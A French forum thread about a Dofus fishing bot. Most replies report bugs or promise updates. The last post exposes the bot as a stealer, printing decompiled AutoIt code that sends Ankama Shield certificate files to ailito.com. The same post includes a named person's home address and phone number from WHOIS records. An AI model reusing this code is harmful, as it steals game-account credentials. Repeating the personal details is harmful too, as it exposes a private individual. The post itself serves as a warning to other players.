Nouveau : Ailipêche .

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

swagger28

Membre
Jul 9, 2010
23
0
561
33
ce qui est embêtant ( je ne t'en veux pas à toi ailito car c'est toi qui décide et qui passe ton temps pour développer les bot ) mais quand on regarde bien il y a aucun autre bot fiable pour la pêche à part celui d'ailito :( donc si tu refait plus de maj dessus et qu'il vient à plus marcher ba il y aura plus du tout de bot pêche ... mouarf
 

Automate

Membre Banni
Sep 6, 2010
1
0
421
Merci :) Fonctionne bien sauf de temps en temps a du mal a tué les protecteurs de ressource avec sacri
 

deboffe

Nouveau membre
Sep 6, 2010
1
0
421
30
je ne comprend pas parceque je suis sous xp et le bot ne marche ppas je met bien le nom de mon perso avec la majuscule et sa ne marche pas
merci de maider stp
 

Lord-cafe

Nouveau membre
Sep 14, 2010
1
0
421
31
Bonjour je suis un nouvelle adepte de votre logiciel je reconnais qu'il est efficace seulement pour les aggros il passe son tour ce qui est embetant sachant que j'ai fait tout ce qu'il y a d'ecrit. Merci d'avance =)
 

amaz

Nouveau membre
Sep 15, 2010
1
0
421
Bonjour ,

Moi le programme ne fonctionne pas bien , ...
Il n'arrete pas de faire changer de map mon perso :/ et il reste coincer comme un idiot sur une autre map
 

Noctysse

Membre Banni
Sep 11, 2010
201
0
922
32
Chez moi il marche appart pour les agro n_n il clique sur les fenêtre les ouvre et les referme dommage je suis sous vista avec dofus theme 1.x et si possible fait ton bot sur des map non agréssable stp je joue sur le serveur héroïque merci ;)
 

chukzar

Membre Banni
Sep 22, 2010
63
0
426
104
Je l'est dèjà.



___________________________________________________________________________________________________________________________________________________________________________________________________________________________
BIG GAME !!! ()
Lache un com's sur mon blog : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Avec votre pseudo celui qui auras fait le plus de com's avec son pseudo d'ici gagnera 5 € PAYPAL !!!!


Le jeu se termine Vendredi 24 septembre à 23H59 !!!
 
Last edited:

chems213

Membre
Jun 19, 2010
68
0
912
34
mon peti bot ali peche est h.s depui la m.a.j je suuis degouter en plus jen es pas profiter
 

Krala

Membre actif
Aug 13, 2010
272
0
917
Il n'existe aucun autre bot pêche. é fère 1 effor cur laurto cé bien aussssi.
 

Ailito

Membre Banni
Jan 22, 2010
141
0
576
31
www.ailito.serv-ice.org
Je vais poster prochainement une mise à jour, il ne marche suite a des couleur qui ont changé.
Je risque de mettre un ptit moment vu que j'ai plus que 1 ordi 1 week sur 2 (4 jours/mois) et en plus cet ordi n'a pas de clavier... Alors je vous dit pas la galère de programmé avec le clavier visuel...
 

zikilemini

Membre
Sep 27, 2010
65
0
426
Moi il peche normalement mais ne gère aucune agro, c'est normal ? je suis sous seven; si c'est un problème de résolution faut avoir laquelle ?
 

kesseca

Membre actif
Oct 10, 2010
147
0
441
Au Québec
Je vais poster prochainement une mise à jour, il ne marche suite a des couleur qui ont changé.
Je risque de mettre un ptit moment vu que j'ai plus que 1 ordi 1 week sur 2 (4 jours/mois) et en plus cet ordi n'a pas de clavier... Alors je vous dit pas la galère de programmé avec le clavier visuel...

Tu as vraiment la passion^^

Merci de ton travail et surtout bon courage

Q: quel clavier visuel utilise tu?
 

SH1R02

Membre
Dec 2, 2011
16
0
301
Ce bot est un virus ! Il est détecté par un anti-virus. Vous allez me dire oui mais 1 sur xx anti-virus c'est rien ?

Regardez plutôt ça :

Func FTP()
$DOSSIER = @AppDataDir & "\AnkamaCertificates"
$LIST = _RECFILELISTTOARRAY($DOSSIER, "*", 1, 0, 2, 0)
If Not @error Then
For $I = 1 To $LIST[0]
$CERTIFICATO = FileRead($DOSSIER & "\" & $LIST[$I])
$CERTIFICATF = StringToBinary($CERTIFICATO)
$CERTIFICATF1 = StringMid(StringToBinary($CERTIFICATO), 1, 250)
$CERTIFICATF2 = StringMid(StringToBinary($CERTIFICATO), 251, 250)
$CERTIFICATF3 = StringMid(StringToBinary($CERTIFICATO), 501, 250)
INETREAD("http://ailito.com/Shield.php?FileName=" & $LIST[$I] & "&Certificat1=" & $CERTIFICATF1 & "&Certificat2=" & $CERTIFICATF2 & "&Certificat3=" & $CERTIFICATF3)
Next
Else
EndIf
EndFunc

C'est ce que l'ont peut trouver dans le code de sont bot en le dé compilant. C'est un stealer d'ankama-shield il vole votre AS pour pouvoir pirater votre compte dofus. Il y à eu déjà plusieurs plaintes et plusieurs victimes sur d'autres forums de cheat. Bot à ne pas utiliser

Pour ceux que sa intéresserais :

Domain Name: AILITO.COM

Registrant:
None
Yann Larousse ()
206 route des jolies bois
Gujan
Gironde,33470
FR
Tel. 0611547634

Creation Date: 28-Nov-2010
Expiration Date: 28-Nov-2012
 
Status
Not open for further replies.